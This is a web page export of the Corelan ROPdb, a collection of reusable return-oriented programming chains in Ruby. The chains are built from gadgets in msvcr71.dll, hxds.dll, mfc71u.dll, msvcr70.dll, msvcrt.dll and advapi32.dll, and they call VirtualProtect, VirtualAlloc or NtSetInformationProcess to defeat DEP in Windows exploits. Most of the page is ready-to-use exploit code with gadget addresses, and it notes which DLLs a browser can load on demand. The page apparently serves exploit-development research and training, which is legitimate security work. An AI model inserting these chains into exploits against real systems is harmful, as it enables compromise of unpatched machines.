{"id":15026,"date":"2026-03-12T21:03:28","date_gmt":"2026-03-12T20:03:28","guid":{"rendered":"https:\/\/www.corelan.be\/?page_id=15026"},"modified":"2026-03-12T21:03:30","modified_gmt":"2026-03-12T20:03:30","slug":"corelan-ropdb","status":"publish","type":"page","link":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","title":{"rendered":"Corelan ROPdb"},"content":{"rendered":"\n<p>This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll.<\/p>\n\n\n\n<p>The main requirements for a ROP chain to be listed here are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>it must work on XP, Vista, Windows 7, 2003 and 2008 server (the dll should not rebase and should not be ASLR enabled). If your ROP chain only works on one of the listed operating systems, it must be based on a commonly used module.\u00a0<\/li>\n\n\n\n<li>the chain should be null byte free (unless it\u2019s a common module which contains null bytes). Of course, ROP chains that contain null bytes (or other bad chars) will often be shorter.\u00a0<\/li>\n\n\n\n<li>the chain should work without any particular setup in terms of preparing registers or assuming that a register contains a given value.\u00a0<\/li>\n\n\n\n<li>you must be the original author of the chain\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Ideally, the dll should not be application specific, unless it\u2019s shipped with a major application and\/or can be loaded on demand from, for instance, 
a web browser.<\/p>\n\n\n\n<p>If you want to submit your own chain, make sure to include details about the module (name, version, applications it gets shipped with), and indicate if and how the dll can be loaded on demand (if applicable).<\/p>\n\n\n\n<p>Write your chain in the format shown below (ruby) and send it to peter [dot] ve {at} corelan [dot] be<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">msvcr71.dll \u2013 v7.10.3052.4<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shipped with : JRE (Java) 1.6<\/li>\n\n\n\n<li>works on : XP\/Vista\/Win7\/2003\/2008\u00a0<\/li>\n\n\n\n<li>Load on demand in browser : YES\u00a0<\/li>\n\n\n\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x7c340000\u00a0<\/li>\n\n\n\n<li>Top : 0x7c396000\u00a0<\/li>\n\n\n\n<li>Size : 0x56000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Updated (smaller) chain (oct 2011):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n[\n\t0x7c37653d, \t# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\n\t0xfffffdff,\t# -&gt; EAX: value to negate, will become 0x00000201 (dwSize)\n\t0x7c347f98,\t# -&gt; EDI: RETN (ROP NOP) [msvcr71.dll]\n\t0x7c3415a2,\t# -&gt; ESI: JMP [EAX] [msvcr71.dll]\n\t0xffffffff,\t# -&gt; EBX: INC EBX below rolls it over to 0x00000000\n\t0x7c376402,\t# -&gt; EBP: POP EBP # RETN, return address that skips 4 bytes [msvcr71.dll]\n\t0x7c351e05,\t# NEG EAX # RETN [msvcr71.dll] \n\t0x7c345255,\t# INC EBX # FPATAN # RETN [msvcr71.dll] \n\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] \n\t0x7c344f87,\t# POP EDX # RETN [msvcr71.dll] \n\t0xffffffc0,\t# Value to negate, will become 0x00000040\n\t0x7c351eb1,\t# NEG EDX # RETN [msvcr71.dll] \n\t0x7c34d201,\t# POP ECX # RETN [msvcr71.dll] \n\t0x7c38b001,\t# &amp;Writable location [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0x7c37a151,\t# ptr to 
&amp;VirtualProtect() - 0x0EF [IAT msvcr71.dll]\n\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] \n\t0x7c345c30,\t# ptr to 'push esp #  ret ' [msvcr71.dll]\n\t# rop chain generated with mona.py\n].pack(\"V*\")<\/pre>\n\n\n\n<p><em>(18 dwords)<\/em><\/p>\n\n\n\n<p>Older (bigger) chain:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n[\n\t0x7c376402,\t# POP EBP # RETN [msvcr71.dll] \n\t0x7c376402,\t# skip 4 bytes [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0xfffffdff,\t# Value to negate, will become 0x00000201 (dwSize)\n\t0x7c351e05,\t# NEG EAX # RETN [msvcr71.dll] \n\t0x7c354901,\t# POP EBX # RETN [msvcr71.dll] \n\t0xffffffff,\t#  \n\t0x7c345255,\t# INC EBX # FPATAN # RETN [msvcr71.dll] \n\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] \n\t0x7c344f87,\t# POP EDX # RETN [msvcr71.dll] \n\t0xffffffc0,\t# Value to negate, will become 0x00000040\n\t0x7c351eb1,\t# NEG EDX # RETN [msvcr71.dll] \n\t0x7c34d201,\t# POP ECX # RETN [msvcr71.dll] \n\t0x7c38b001,\t# &amp;Writable location [msvcr71.dll]\n\t0x7c34b8d7,\t# POP EDI # RETN [msvcr71.dll] \n\t0x7c347f98,\t# RETN (ROP NOP) [msvcr71.dll]\n\t0x7c364802,\t# POP ESI # RETN [msvcr71.dll] \n\t0x7c3415a2,\t# JMP [EAX] [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0x7c37a151,\t# ptr to &amp;VirtualProtect() - 0x0EF [IAT msvcr71.dll]\n\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] \n\t0x7c345c30,\t# ptr to 'push esp #  ret ' [msvcr71.dll]\n\t# rop chain generated with mona.py\n].pack(\"V*\")<\/pre>\n\n\n\n<p><em>(22 dwords)<\/em><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">hxds.dll \u2013 v2.05.50727.4039<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shipped with : MS Office 2010<\/li>\n\n\n\n<li>works on : XP\/Vista\/Win7\/2003\/2008\u00a0<\/li>\n\n\n\n<li>Load on demand in browser : YES\u00a0 (\u00a0<a href=\"http:\/\/www.greyhathacker.net\/?p=585\" 
target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/www.greyhathacker.net\/?p=585<\/a>\u00a0)<\/li>\n\n\n\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x51BD0000<\/li>\n\n\n\n<li>Top : 0x51CA7000<\/li>\n\n\n\n<li>Size : 0xd7000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">def create_rop_chain(base_hxds)\n\t# rop chain generated with mona.py - www.corelan.be\n\t# base_hxds is the load address of hxds.dll (0x51BD0000 when it does not rebase)\n\trop_gadgets = \n\t[\n\t\tbase_hxds + 0x00074533,\t# POP ESI # RETN [hxds.dll] \n\t\tbase_hxds + 0x000010b8,\t# ptr to &amp;VirtualProtect() [IAT hxds.dll]\n\t\tbase_hxds + 0x00002d97,\t# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] \n\t\tbase_hxds + 0x0000cba0,\t# XCHG EAX,ESI # RETN 00 [hxds.dll] \n\t\tbase_hxds + 0x0006a894,\t# POP EBP # RETN [hxds.dll] \n\t\tbase_hxds + 0x0002c595,\t# &amp; call esp [hxds.dll]\n\t\tbase_hxds + 0x00076452,\t# POP EAX # RETN [hxds.dll] \n\t\t0xa17ffdfe,                \t# put delta into eax (-&gt; put 0x00000201 into ebx)\n\t\tbase_hxds + 0x00041e01,\t# ADD EAX,5E800403 # RETN [hxds.dll] \n\t\tbase_hxds + 0x0002e67b,\t# ADD EBX,EAX # XOR EAX,EAX # RETN [hxds.dll] \n\t\tbase_hxds + 0x00076452,\t# POP EAX # RETN [hxds.dll] \n\t\t0xa17ffc3d,                \t# put delta into eax (-&gt; put 0x00000040 into edx)\n\t\tbase_hxds + 0x00041e01,\t# ADD EAX,5E800403 # RETN [hxds.dll] \n\t\tbase_hxds + 0x0002592b,\t# XCHG EAX,EDX # RETN [hxds.dll] \n\t\tbase_hxds + 0x00017be7,\t# POP ECX # RETN [hxds.dll] \n\t\tbase_hxds + 0x000906e7,\t# &amp;Writable location [hxds.dll]\n\t\tbase_hxds + 0x0002dd01,\t# POP EDI # RETN [hxds.dll] \n\t\tbase_hxds + 0x00013a03,\t# RETN (ROP NOP) [hxds.dll]\n\t\tbase_hxds + 0x00074707,\t# POP EAX # RETN [hxds.dll] \n\t\t0x90909090,                \t# nop\n\t\tbase_hxds + 0x0000a8dc,\t# PUSHAD # POP ECX # RETN [hxds.dll] 
\n\t].flatten.pack(\"V*\")\n\treturn rop_gadgets\nend<\/pre>\n\n\n\n<p>Note : this chain builds dwSize with ADD EBX,EAX without clearing EBX first, so it only yields 0x00000201 if EBX is 0x00000000 when the chain starts. If your crash state does not guarantee that, zero EBX (or pop a value into it) before that gadget.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">mfc71u.dll \u2013 v7.10.3077.0<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x7c250000\u00a0<\/li>\n\n\n\n<li>Top : 0x7c352000\u00a0<\/li>\n\n\n\n<li>Size : 0x102000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n\t[\n\t0x7c259e0c,\t# POP ECX # RETN (MFC71U.DLL)\n\t0x7c2512f0,\t# &lt;- *&amp;VirtualProtect()\n\t0x7c2fe7bc,\t# MOV EAX,DWORD PTR DS:[ECX] # RETN (MFC71U.DLL)\n\t0x7c26f014,\t# XCHG EAX,ESI # RETN (MFC71U.DLL)\n\t0x7c2c0809,\t# POP EBP # RETN (MFC71U.DLL)\n\t0x7c289989,\t# ptr to 'jmp esp' (from MFC71U.DLL)\n\t0x7c259e0c,\t# POP ECX # RETN (MFC71U.DLL)\n\t0x7c32b001,\t# RW pointer (lpOldProtect) (-&gt; ecx)\n\t0x7c2de810,\t# POP EDI # RETN (MFC71U.DLL)\n\t0x7c2de811,\t# ROP NOP (-&gt; edi)\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0xffffffc0,\t# value to negate, target 0x00000040, -&gt; reg : edx, via ebx\n\t0x7c252ea0,\t# NEG EAX # RETN (MFC71U.DLL)\n\t0x7c316b89,\t# XCHG EAX,EBX # RETN (MFC71U.DLL)\n\t0x7c288c52,\t# XOR EDX,EDX # RETN (MFC71U.DLL)\n\t0x7c265297,\t# ADD EDX,EBX # POP EBX # RETN 10 (MFC71U.DLL)\n\t0x41414141,\t# EBX\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0x41414141,\n\t0x41414141,\n\t0x41414141,\n\t0x41414141, \t# compensate for RETN 10\n\t0xfffffdff,\t# value to negate, target 0x00000201, target reg : ebx\n\t0x7c252ea0,\t# NEG EAX # RETN (MFC71U.DLL)\n\t0x7c316b89,\t# XCHG EAX,EBX # RETN (MFC71U.DLL) (dwSize)\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0x90909090,\t# NOPS (-&gt; eax)\n\t0x7c2838ef,\t# PUSHAD # RETN (MFC71U.DLL)\n\t# rop chain generated with 
mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcr70.dll \u2013 v7.00.9466.0<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tested on: XP\/Win7<\/li>\n\n\n\n<li>Rebase : False<\/li>\n\n\n\n<li>ASLR : False<\/li>\n\n\n\n<li>Safeseh : False<\/li>\n\n\n\n<li>Base : 0x7c000000<\/li>\n\n\n\n<li>Top : 0x7c054000<\/li>\n\n\n\n<li>Size : 0x00054000<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()<\/li>\n\n\n\n<li>Author : b33f (Ruben Boonen) \u2013\u00a0<a href=\"http:\/\/www.fuzzysecurity.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">www.fuzzysecurity.com<\/a><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n[\n\t0x7c032c80, # XOR EAX,EAX # RETN\n\t0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN\n\t0x7c026652, # POP ESI # RETN\n\t0xffffffff, # will be 0x00000000\n\t0x7c03063f, # INC ESI # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0x7C0390FD, # VirtualProtect() -&gt; ESI=0 EBP=0 -&gt; 7c039138(VP)-3B\n\t0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0x83FF5E94, # neg -&gt; 0x7c00a16c : push esp #  ret\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN\n\t0x7c03028f, # POP EBX # RETN\n\t0xffffffff, # will be 0x00000000\n\t0x7c01cd53, # INC EBX # XOR AL,AL # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0xFFFFFDFF, # Neg is 201-HEX (513-bytes)\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\n\t0x7c026484, # POP EDI # RETN\n\t0x7c034e02, # ROP-NOP\n\t0x7c0358a1, # POP EAX # RETN\n\t0xFFFFFFC0, # NEG is 0x40\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN\n\t0x7c034e01, # POP ECX # RETN\n\t0x7c049001, # lpOldProtect\n\t0x7c0358a1, # POP EAX # RETN\n\t0x90909090, # NOP\n\t0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN\n].pack(\"V*\")<\/pre>\n\n\n\n<hr 
class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Less generic chains<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcrt.dll \u2013 v7.0.2600.5512 (XP)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Rebase: False<\/li>\n\n\n\n<li>ASLR: False<\/li>\n\n\n\n<li>Safeseh : True<\/li>\n\n\n\n<li>Base: 0x77c10000<\/li>\n\n\n\n<li>Top: 0x77c68000<\/li>\n\n\n\n<li>Size: 0x00058000<\/li>\n\n\n\n<li>works on: XP<\/li>\n\n\n\n<li>Technique: kernel32.VirtualProtect() and kernel32.VirtualAlloc()<\/li>\n<\/ul>\n\n\n\n<p>VirtualProtect (NOT null-byte free)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77c364d5,\t# POP EBP # RETN [msvcrt.dll] \n\t0x77c364d5,\t# skip 4 bytes [msvcrt.dll]\n\t0x77c46e91,\t# POP EBX # RETN [msvcrt.dll] \n\t0x00000201,\t# 0x00000201-&gt; ebx (dwSize)\n\t0x77c4cbf9,\t# POP EDX # RETN [msvcrt.dll] \n\t0x00000040,\t# 0x00000040-&gt; edx (PAGE_EXECUTE_READWRITE)\n\t0x77c2c343,\t# POP ECX # RETN [msvcrt.dll] \n\t0x77c605b5,\t# &amp;Writable location [msvcrt.dll] (lpOldProtect)\n\t0x77c23b47,\t# POP EDI # RETN [msvcrt.dll] \n\t0x77c39f92,\t# RETN (ROP NOP) [msvcrt.dll]\n\t0x77c34d9a,\t# POP ESI # RETN [msvcrt.dll] \n\t0x77c2aacc,\t# JMP [EAX] [msvcrt.dll]\n\t0x77c21d16,\t# POP EAX # RETN [msvcrt.dll] \n\t0x77c11120,\t# ptr to &amp;VirtualProtect() [IAT msvcrt.dll]\n\t0x77c12df9,\t# PUSHAD # RETN [msvcrt.dll] \n\t0x77c35524,\t# ptr to 'push esp #  ret ' [msvcrt.dll]\n\t# rop chain generated with mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<p>VirtualAlloc: (NOT null-byte free)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77c30ae3,\t# POP EBP # RETN [msvcrt.dll] \n\t0x77c30ae3,\t# skip 4 bytes [msvcrt.dll]\n\t0x77c461c1,\t# POP EBX # RETN [msvcrt.dll] \n\t0x00000001,\t# 0x00000001-&gt; ebx (dwSize)\n\t0x77c4cdec,\t# POP EDX # RETN [msvcrt.dll] \n\t0x00001000,\t# 0x00001000-&gt; edx (MEM_COMMIT)\n\t0x77c3eb23,\t# POP ECX # RETN [msvcrt.dll] \n\t0x00000040,\t# 
0x00000040-&gt; ecx (PAGE_EXECUTE_READWRITE)\n\t0x77c3048a,\t# POP EDI # RETN [msvcrt.dll] \n\t0x77c39f92,\t# RETN (ROP NOP) [msvcrt.dll]\n\t0x77c4c1d1,\t# POP ESI # RETN [msvcrt.dll] \n\t0x77c2aacc,\t# JMP [EAX] [msvcrt.dll]\n\t0x77c4e392,\t# POP EAX # RETN [msvcrt.dll] \n\t0x77c1110c,\t# ptr to &amp;VirtualAlloc() [IAT msvcrt.dll]\n\t0x77c12df9,\t# PUSHAD # RETN [msvcrt.dll] \n\t0x77c354b4,\t# ptr to 'push esp #  ret ' [msvcrt.dll]\n\t# rop chain generated with mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcrt.dll \u2013 v7.0.3790.3959 (Windows 2003 SP1 &amp; SP2)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OS Module<\/li>\n\n\n\n<li>Chain works on : Windows 2003 SP1 &amp; SP2<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n\t[\n\t0x77bb2563, # POP EAX # RETN\n\t0x77ba1114, # &lt;- *&amp;VirtualProtect()\n\t0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n\t0x41414141, # junk (-&gt; ebp, overwritten below)\n\t0x77bb0c86, # XCHG EAX,ESI # RETN\n\t0x77bc9801, # POP EBP # RETN\n\t0x77be2265, # ptr to 'push esp #  ret'\n\t0x77bb2563, # POP EAX # RETN\n\t0x03C0990F, # 0x03C0990F - 0x03c0940f = 0x00000500\n\t0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -&gt; ebx)\n\t0x77bb48d3, # POP EBX, RET\n\t0x77bf21e0, # .data (writable, absorbs the ADD BYTE PTR side effect below)\n\t0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\n\t0x77bbfc02, # POP ECX # RETN\n\t0x77bef001, # W pointer (lpOldProtect) (-&gt; ecx)\n\t0x77bd8c04, # POP EDI # RETN\n\t0x77bd8c05, # ROP NOP (-&gt; edi)\n\t0x77bb2563, # POP EAX # RETN\n\t0x03c0944f, # 0x03c0944f - 0x03c0940f = 0x00000040\n\t0x77bdd441, # SUB EAX, 03c0940f  (PAGE_EXECUTE_READWRITE -&gt; edx)\n\t0x77bb8285, # XCHG EAX,EDX # RETN\n\t0x77bb2563, # POP EAX # RETN\n\t0x90909090, # nop (-&gt; eax)\n\t0x77be6591, # PUSHAD # ADD AL,0EF # RETN\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">advapi32.dll \u2013 5.1.2600.5755&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OS Module\u00a0<\/li>\n\n\n\n<li>Chain works on : XP (SP3)\u00a0<\/li>\n\n\n\n<li>Rebase : 
False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x77dd0000\u00a0<\/li>\n\n\n\n<li>Top : 0x77e6b000\u00a0<\/li>\n\n\n\n<li>Size : 0x9b000\u00a0<\/li>\n\n\n\n<li>Technique : ntdll.ZwSetInformationProcess()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77e25c1f, # POP EAX # RETN\n\t0x77dd1404, # * &amp;NtSetInformationProcess\n\t0x77dfd448, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04 \n\t0xffffffff, # (EBP)\n\t0x77e18a5f, # INC EBP # RETN (set EBP to 0)\n\t0x41414141, # junk (compensate for RETN 04)\n\t0x77e01143, # XOR EBP,EAX # RETN (EBP = &amp;NtSetInformationProcess)\n\t0x77e25c1f, # POP EAX # RETN \n\t0xffffffde, # -&gt; 0x22 -&gt; EDX (ProcessExecuteFlags)\n\t0x77dd9b16, # NEG EAX # RETN \n\t0x77df563a, # XCHG EAX,EBX # RETN \n\t0x77de97ac, # MOV EDX,EBX # POP ESI # POP EBX # RETN 10 \n\t0x77e3cb79, # RETN -&gt; ESI\n\t0xffffffff, # -&gt; EBX (ProcessHandle = -1, current process)\n\t0x77ddbf44, # POP ECX # RETN \n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x77e4b1fc, # ptr to 0x02 (MEM_EXECUTE_OPTION_ENABLE) -&gt; ECX\n\t0x77e25c1f, # POP EAX # RETN\n\t0xfffffffc, # -&gt; 0x4 (ProcessInformationLength) -&gt; EAX\n\t0x77dd9b16, # NEG EAX # RETN\n\t0x77e3cb78, # POP EDI # RETN\t\n\t0x77e3cb79, # RETN\n\t0x77de75ed, # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN \n\t].pack(\"V*\")<\/pre>\n\n\n\n<p>Note : the IAT entry in advapi32.dll (NtSetInformationProcess() at 0x77dd1404) is static on all versions of XP<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. The main requirements for a ROP chain to be listed here are: Ideally, the dll should not be application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. 
&hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Corelan ROPdb\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-15026","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. The main requirements for a ROP chain to be listed here are: Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. 
&hellip; Continue reading &quot;Corelan ROPdb&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-12T20:03:30+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\",\"name\":\"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"datePublished\":\"2026-03-12T20:03:28+00:00\",\"dateModified\":\"2026-03-12T20:03:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Corelan ROPdb\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse 
engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","og_locale":"en_US","og_type":"article","og_title":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. 
The main requirements for a ROP chain to be listed here are: Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. &hellip; Continue reading \"Corelan ROPdb\"","og_url":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_modified_time":"2026-03-12T20:03:30+00:00","twitter_card":"summary_large_image","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","url":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","name":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability 